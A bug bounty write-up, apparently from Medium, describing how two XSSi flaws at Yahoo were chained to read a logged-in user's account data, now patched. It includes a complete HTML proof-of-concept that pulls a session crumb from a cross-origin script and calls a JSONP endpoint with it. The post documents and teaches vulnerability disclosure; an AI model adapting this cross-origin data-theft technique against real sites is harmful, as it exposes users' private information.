Yahoo — Two XSSi vulnerabilities chained to steal user information. ($750 Bounty)

hyde
hyde
Jul 29, 2018 · 3 min read

While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn’t valid it would return the following response:

At this point I realized that if I could somehow steal the victims valid .crumb value, I could successfully steal information about their account. I then searched all requests I intercepted in Burp Suite for my valid crumb and I quickly found it in in a dynamic Javascript file located at: https://messenger.yahoo.com/embed/app.js

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people that don’t understand how XSSi works the vulnerability essentially takes advantage of Same-Origin Policy (SOP) not being applied to Javascript src attribute within the script tag. I then created the following Proof of Concept which steals the valid .crumb value from the dynamic Javascript file at https://messenger.yahoo.com/embed/app.js and then places the valid crumb in the .crumb GET parameter as seen here https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx. which returns a proper response containing information about the user. Using the code below I was able to extract information:

<html>
<head>
<title>Yahoo XSSi PoC</title>
</head>
<body>
<div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">
<h1 style="text-align: center;">Proof of Concept</h1>
<b>Dataset 1:</b>
<div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
<br/>
<b>Dataset 2:</b>
<div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
</div>
<script>
function processDeviceUsers(data) {
document.getElementById("content1").innerHTML = JSON.stringify(data);
}
window.onload = function () {
var config = {};
config_data = {};
config.merge = function(data) { config_data = data };
iris.initConfig(config);
document.getElementById("content2").innerHTML = JSON.stringify(config_data);
var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;
var s = document.createElement('script');
s.setAttribute('src', src);
document.body.appendChild(s);
}
</script>
<script src="https://messenger.yahoo.com/embed/app.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
</body>
</html>

Below is a screenshot of the payload I submitted to Yahoo and received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write up.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store